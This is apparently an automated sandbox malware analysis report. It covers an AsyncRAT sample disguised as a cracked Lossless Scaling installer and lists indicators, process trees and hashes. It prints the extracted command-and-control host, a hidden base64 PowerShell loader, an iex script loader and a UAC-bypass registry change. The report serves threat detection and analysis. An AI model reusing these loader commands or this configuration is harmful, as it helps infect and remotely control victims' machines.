Analysis
-
max time kernel
120s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
06/02/2025, 19:45
Static task
static1
URLScan task
urlscan1
General
Malware Config
Extracted
asyncrat
A 14
Default
eg3x6.giize.com:306
MaterxMutex_Egypt2
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 5128 powershell.exe 1476 powershell.exe 1808 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 2 IoCs
pid Process 5112 LosslessScaling.exe 5400 RAR.exe -
Loads dropped DLL 1 IoCs
pid Process 5112 LosslessScaling.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: NOTEPAD.EXE -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 6 drive.google.com 9 drive.google.com -
Drops file in System32 directory 11 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs svchost.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1808 set thread context of 1944 1808 powershell.exe 155 -
Drops file in Program Files directory 31 IoCs
description ioc Process File created C:\Program Files (x86)\Lossless Scaling\pt-PT\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\tr\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\Lan.vbs powershell.exe File created C:\Program Files (x86)\Lossless Scaling\Lossless.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\he\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\pl\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\Licenses.txt powershell.exe File created C:\Program Files (x86)\Lossless Scaling\Lossless Scaling.lnk powershell.exe File created C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe powershell.exe File created C:\Program Files (x86)\Lossless Scaling\id\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\bg\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\de\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\fa\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\lt\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\ar\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\fr\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\ja\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\uk\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\config.ini powershell.exe File created C:\Program Files (x86)\Lossless Scaling\cs\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\vi\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\zh-TW\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\es-ES\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\pt-BR\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\ro\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\zh-CN\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\ko\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe.config powershell.exe File created C:\Program Files (x86)\Lossless Scaling\sr-Latn\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\it\LosslessScaling.resources.dll powershell.exe File created C:\Program Files (x86)\Lossless Scaling\hr\LosslessScaling.resources.dll powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies Control Panel 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000\Control Panel\Colors LosslessScaling.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000_Classes\Local Settings mspaint.exe Key created \REGISTRY\USER\S-1-5-21-1412605595-2147700071-3468511006-1000_Classes\Local Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3776 reg.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 1944 aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 3228 msedge.exe 3228 msedge.exe 4940 msedge.exe 4940 msedge.exe 220 msedge.exe 220 msedge.exe 1940 identity_helper.exe 1940 identity_helper.exe 5980 mspaint.exe 5980 mspaint.exe 5128 powershell.exe 5128 powershell.exe 5128 powershell.exe 1476 powershell.exe 1476 powershell.exe 1476 powershell.exe 5112 LosslessScaling.exe 5112 LosslessScaling.exe 1476 powershell.exe 1808 powershell.exe 1808 powershell.exe 1808 powershell.exe 1808 powershell.exe 1808 powershell.exe 1944 aspnet_compiler.exe 5112 LosslessScaling.exe 5112 LosslessScaling.exe 5112 LosslessScaling.exe 5112 LosslessScaling.exe 5112 LosslessScaling.exe 5112 LosslessScaling.exe 5112 LosslessScaling.exe 5112 LosslessScaling.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 5128 powershell.exe Token: SeDebugPrivilege 1476 powershell.exe Token: SeDebugPrivilege 5112 LosslessScaling.exe Token: SeDebugPrivilege 1808 powershell.exe Token: SeDebugPrivilege 1944 aspnet_compiler.exe Token: SeIncBasePriorityPrivilege 5112 LosslessScaling.exe -
Suspicious use of FindShellTrayWindow 35 IoCs
pid Process 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
pid Process 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe 4940 msedge.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 5980 mspaint.exe 3036 OpenWith.exe 5112 LosslessScaling.exe 1944 aspnet_compiler.exe 5112 LosslessScaling.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4940 wrote to memory of 4536 4940 msedge.exe 84 PID 4940 wrote to memory of 4536 4940 msedge.exe 84 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 1080 4940 msedge.exe 85 PID 4940 wrote to memory of 3228 4940 msedge.exe 86 PID 4940 wrote to memory of 3228 4940 msedge.exe 86 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 PID 4940 wrote to memory of 3488 4940 msedge.exe 87 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://drive.google.com/file/d/12_FHYiGAJjr_9k7nMRclVc5d9oFiJjga/view1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4940 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9007846f8,0x7ff900784708,0x7ff9007847182⤵PID:4536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:22⤵PID:1080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2444 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3228
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2728 /prefetch:82⤵PID:3488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:12⤵PID:4348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3408 /prefetch:12⤵PID:2488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:12⤵PID:3588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:12⤵PID:2620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5640 /prefetch:82⤵PID:736
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:12⤵PID:2092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6368 /prefetch:82⤵PID:4448
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6368 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2088,5417509382982490119,17176750054990683351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:220
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:776
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3200
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5428
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\Temp1_lossless scaling.zip\password 123.txt1⤵PID:5568
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" E:\HOW TO CRACK.txt1⤵
- Enumerates connected drives
PID:5724
-
C:\Windows\system32\mspaint.exe"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Desktop\a\How to run the program.png" /ForceBootstrapPaint3D1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5980
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc1⤵
- Drops file in System32 directory
PID:5996
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Suspicious use of SetWindowsHookEx
PID:3036
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\a\install + Crack.bat" "1⤵PID:1456
-
C:\Windows\system32\reg.exeREG QUERY "HKU\S-1-5-19"2⤵PID:5140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "$b='"cG93ZXJzaGVsbCAtRXhlY3V0aW9uUG9saWN5IEJ5cGFzcyAtRmlsZSBsYW5ndWFnZS93aW5feC5wczE="';Invoke-Expression([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($b)))"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5128 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File language/win_x.ps13⤵
- UAC bypass
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1476 -
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD HKCU\SOFTWARE\Valve\Steam\Apps\993090 /v Installed /t REG_DWORD /d 1 /f4⤵
- Modifies registry key
PID:3776
-
-
C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"C:\Program Files (x86)\Lossless Scaling\LosslessScaling.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Control Panel
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5112
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator4⤵PID:4652
-
-
C:\Users\Public\IObitUnlocker\RAR.exe"C:\Users\Public\IObitUnlocker\RAR.exe" x -pahmad..123 -o+ C:\Users\Public\IObitUnlocker\EN.dll C:\Users\Public\IObitUnlocker\4⤵
- Executes dropped EXE
PID:5400
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Public\IObitUnlocker\Loader.vbs"4⤵
- Checks computer location settings
PID:4860 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass iex([IO.File]::ReadAllText('C:\Users\Public\IObitUnlocker\Report.ps1'))5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1808 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵PID:5852
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1944
-
-
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /query /tn administrator4⤵PID:3280
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
4.3MB
MD57969a2cbc4c31ccfb1ab8213f19501b9
SHA106a24af6e922ba2cd7fccb76ce2f43271a9af8b6
SHA256486a48562504a274e984599a5931de200ea73bf6bc4c83bf6ca8daa651e80a68
SHA512935988a39c1af479e971850f6758ee94098b35f173da609206312deeabeb3bc9466f93d1dad4e6d7938235f65fc52fdbd56058d46c1ba775d31718358eb6d8fa
-
Filesize
953KB
MD52c98d33096e97094cbbbd19f27f40883
SHA17e28af9d119d2658f962e3b28140c6081be1612b
SHA256010ac1120a88a772e87d9e9018aa5db034a9bac9399803d4a7c4db3c47a71df6
SHA512f9070ad6b2e3295fdde13aa8d7486147a7f9a675a924ad3bf117479baf5b573cf92650199e58378dd8345a28ab890bbd5021d374030c24836bfa65bb037dddc7
-
Filesize
174B
MD52a2df45a07478a1c77d5834c21f3d7fd
SHA1f949e331f0d75ba38d33a072f74e2327c870d916
SHA256051099983b896673909e01a1f631b6652abb88da95c9f06f3efef4be033091fa
SHA5121a6dd48f92ea6b68ee23b86ba297cd1559f795946ecda17ade68aea3dda188869bba380e3ea3472e08993f4ae574c528b34c3e25503ee6119fd4f998835e09d7
-
Filesize
430B
MD5ef7d84d756944b899e4fb5d1a3339235
SHA1bcac0a048a418caec5281cc44121576d1cde4e70
SHA256069ae15289a748ae4e1a998183c41c35a873cb8dc205318813b157c826bab6ca
SHA512a73e18adaa6f1e93a457d4593a652ee47eb730cac3b81cfbc1fc3ab90aa05f518ae7c96c78e94ab92949dd2c4e9a459bb54012e97fb53554397d5a6a8b556327
-
Filesize
2KB
MD545fed0a3bcbc889ca99d0c5943210e7e
SHA1602584366a413cb9ae459b6c3231190cd787241e
SHA2569812fe8104a86e693d6baa02a4cdb56ea9a4aedb500b050346eb5ec6bda8dd09
SHA512d0728fcce9484daedb2c9552ee2a818f7cccbeb1e9bca24a1c4fc1ca6e8c181c46cdc89670bfee3d6ad219ea6f69750bd03f776af4f9e4667872c66c11dbd255
-
Filesize
3KB
MD5223bd4ae02766ddc32e6145fd1a29301
SHA1900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA2561022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc
-
Filesize
152B
MD5a7b5a5433fe76697fec05973806a648c
SHA1786027abe836d4d8ff674c463e5bb02c4a957b70
SHA256c8d623536ebdf5ffbefb84013d1c8ff5f853b59f1b09c80364c32b8ed5e4a735
SHA51227be4c82e26468bbb9ce698ef305320f6cac46c953f88c714a0372fa524d098b9af2a87a88b14a134ff0f5f4b3d671902908622d2c7ec48e2c7bc458d7f5cc16
-
Filesize
152B
MD58ea156392347ae1e43bf6f4c7b7bc6ec
SHA17e1230dd6103043d1c5d9984384f93dab02500a6
SHA25640b28bf59b3e2026ad3ebe2fecf464a03d7094fd9b26292477ad264d4efc1c75
SHA5122479b86a9a31aa2f260ff6a1c963691994242ced728a27ffa2ee4e224945446a191bdb49ce399ec5a7d5d362499716133072e97d4253b5b4f09582d58b25144f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize480B
MD59a1f084e58592e0255286e9b18b98957
SHA172548af272d68c24b412cced52c9a01e5db499e1
SHA256267b4852f6c6650f88884b3770f624e6fdad6892f5b8f9c6329f27c01893a83d
SHA5121be79573e390f2ae95d002879945d58d266f6861a12c0a1195ac65d9c36dcf58374292815295e2d6beedde94cd93b63844850729752a1fa300cb40a11c96049f
-
Filesize
3KB
MD5bc0e763361385a3c65e1f72a352a61e2
SHA1883d17322756780ece65304af4ba266a8a28374f
SHA25653e8931727652bea303f04f2a54ebf28f300807f30aa83ad0a0e44f04cc1cb63
SHA51298e07d87954b7cc031735e4b17e55356c6c98dbecd8d5c4d6cb4e16e0d97cd214f54730599aee019829ecf333a015e97c9fe72b76e256ec762f5fb9907692cc2
-
Filesize
5KB
MD5a8a3efe24108ea71713b80614367ea2f
SHA11b36a38b9d12923f067f31be26ecb9299de6bb7c
